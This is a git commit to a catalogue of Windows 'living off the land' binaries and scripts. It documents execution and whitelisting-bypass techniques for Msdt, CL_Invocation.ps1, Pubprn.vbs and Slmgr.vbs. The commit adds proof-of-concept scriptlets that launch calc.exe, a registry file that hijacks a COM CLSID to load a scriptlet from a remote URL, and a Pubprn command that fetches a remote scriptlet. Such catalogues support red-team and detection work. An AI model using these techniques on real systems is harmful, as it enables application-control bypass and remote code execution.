Added more in new structure

api0cradle · api0cradle · commit 0eb4ec64e3f0 · 2018-04-18T16:59:53.000+02:00
diff --git a/Contribute.md b/Contribute.md
@@ -0,0 +1,29 @@
+Template
+
+## Binary.exe
+
+* Functions: Execute
+
+```
+Example
+```
+
+Acknowledgements:
+* Name of guy - @twitterhandle
+
+Code sample:
+* [NameOfLink](Payload/NameOfPayload)
+
+Resources:
+* https://linktosomethingusefull.com
+
+Full path:
+```
+c:\windows\system32\binary.exe
+```
+
+Notes:
+Some specific details about the binary file.
+
+
+ 
diff --git a/LOLBins.md b/LOLBins.md
@@ -15,6 +15,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 [Installutil.exe](OSBinaries/Installutil.md)      
 [Mavinject32.exe](OSBinaries/Mavinject32.md)       
 [Msbuild.exe](OSBinaries/Msbuild.md)    
+[Msdt.exe](OSBinaries/Msdt.md)     
 [Mshta.exe](OSBinaries/Mshta.md)     
 [Msiexec.exe](OSBinaries/Msiexec.md)    
 [Odbcconf.exe](OSBinaries/Odbcconf.md)     
diff --git a/LOLScripts.md b/LOLScripts.md
@@ -5,3 +5,4 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 
 # OS SCRIPTS
 
+[Cl_invocation](OSScripts/Cl_invocation.md) 
diff --git a/OSBinaries/Msdt.md b/OSBinaries/Msdt.md
@@ -0,0 +1,15 @@
+## Msdt.exe
+
+* Functions: Execute
+
+```
+Open .diagcab package
+```
+
+Acknowledgements:
+* ?
+
+Resources:
+* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/    
+* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/  
+ 
diff --git a/OSScripts/Cl_invocation.md b/OSScripts/Cl_invocation.md
@@ -0,0 +1,29 @@
+## CL_Invocation.ps1
+
+* Functions: Execute
+
+```
+. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1   
+SyncInvoke <executable> [args]
+```
+
+Acknowledgements:
+* Jimmy - @bohops
+
+Code sample:
+
+
+Resources:
+* https://twitter.com/bohops/status/948548812561436672
+
+Full path:
+```
+C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
+```
+
+Notes:
+
+
+
+
+ 
diff --git a/OSScripts/Pubprn.md b/OSScripts/Pubprn.md
@@ -0,0 +1,29 @@
+## Pubprn.vbs
+
+* Functions: Execute
+
+```
+pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
+```
+
+Acknowledgements:
+* Matt Nelson - @enigma0x3
+
+Code sample:
+* [Pubprn_calc.sct](Payload/Pubprn_calc.sct)
+
+Resources:
+* https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
+* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+
+Full path:
+```
+C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
+C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
+```
+
+Notes:
+
+
+
+ 
diff --git a/OSScripts/Slmgr.md b/OSScripts/Slmgr.md
@@ -0,0 +1,30 @@
+## Slmgr.vbs
+
+* Functions: Execute
+
+```
+slmgr.vbs
+```
+
+Acknowledgements:
+* Matt Nelson - @enigma0x3
+* Casey Smith - @subtee
+
+Code sample:
+* [NameOfLink](Payload/NameOfPayload)
+
+Resources:
+* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+* https://www.youtube.com/watch?v=3gz1QmiMhss
+
+Full path:
+```
+c:\windows\system32\slmgr.vbs    
+c:\windows\sysWOW64\slmgr.vbs    
+```
+
+Notes:
+Requires registry keys to work.
+
+
+ 
diff --git a/Payload/Pubprn_calc.sct b/Payload/Pubprn_calc.sct
@@ -0,0 +1,22 @@
+<?XML version="1.0"?>
+<scriptlet>
+
+<registration
+    description="Bandit"
+    progid="Bandit"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+    remotable="true"
+	>
+</registration>
+
+<script language="JScript">
+<![CDATA[
+
+	var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+	
+	
+]]>
+</script>
+
+</scriptlet>
diff --git a/Payload/Slmgr.reg b/Payload/Slmgr.reg
@@ -0,0 +1,24 @@
+Windows Registry Editor Version 5.00
+
+[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
+@=""
+
+[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID]
+@="{00000001-0000-0000-0000-0000FEEDACDC}"
+
+
+[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
+@="Scripting.Dictionary"
+
+[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
+@="C:\\WINDOWS\\system32\\scrobj.dll"
+"ThreadingModel"="Apartment"
+
+[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
+@="Scripting.Dictionary"
+
+[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
+@="https://gist.githubusercontent.com/enigma0x3/4373e9a63aaebe177c747af9bc6da743/raw/2207d8a1a536371aff5f61c8bef8400622868976/wee.png"
+
+[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
+@="Scripting.Dictionary"
diff --git a/Payload/Slmgr_calc.sct b/Payload/Slmgr_calc.sct
@@ -0,0 +1,22 @@
+<?XML version="1.0"?>
+<scriptlet>
+
+<registration
+    description="Scripting.Dictionary"
+    progid="Scripting.Dictionary"
+    version="1"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+    remotable="true"
+	>
+</registration>
+
+<script language="JScript">
+<![CDATA[
+
+		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+	
+	
+]]>
+</script>
+
+</scriptlet>

Original file line number	Diff line number	Diff line change
`@@ -5,3 +5,4 @@ If you are missing from the acknowledgement, please let me know (I did not forge`
`5`	`5`
`6`	`6`	`# OS SCRIPTS`
`7`	`7`
	`8`	`+[Cl_invocation](OSScripts/Cl_invocation.md)`